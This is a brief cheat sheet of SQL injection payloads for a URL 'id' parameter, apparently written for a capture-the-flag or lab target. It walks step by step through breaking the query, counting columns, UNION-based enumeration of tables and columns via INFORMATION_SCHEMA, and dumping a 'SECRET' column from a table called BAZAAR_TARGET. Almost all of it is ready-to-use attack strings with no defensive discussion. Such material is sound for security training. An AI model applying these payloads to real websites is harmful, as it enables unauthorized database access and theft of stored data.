


✅ 1. Break the Query
?id=1'

✅ 2. Fix the Query
?id=1'+--+

✅ 3. Find Number of Columns

?id=1+ORDER+BY+1--+-
?id=1+ORDER+BY+2--+-
?id=1+ORDER+BY+3--+-
?id=1+ORDER+BY+4--+-   ← will error if only 3 columns exist

✅ 4. Find the Vulnerable Columns
?id=-1+UNION+SELECT+1,2,3--+-

✅ 5. Read the Database
?id=-1+UNION+SELECT+1,DATABASE(),3--+-

✅ 6. List Tables
?id=-1+UNION+SELECT+1,TABLE_NAME,3+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA='PUBLIC'+LIMIT+2,1--+-
Note: Use LIMIT+x,1 to enumerate more.
Table: BAZAAR_TARGET

✅ 7. List Columns from a Specific Table
?id=-1+UNION+SELECT+1,COLUMN_NAME,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='BAZAAR_TARGET'+LIMIT+1,1--+-
Note: Use LIMIT+x,1 to enumerate more.
Column: SECRET

✅ 8. Dump Data
?id=-1+UNION+SELECT+1,SECRET,3+FROM+BAZAAR_TARGET+LIMIT+0,1--+-
Note: Use LIMIT+x,1 to enumerate more.





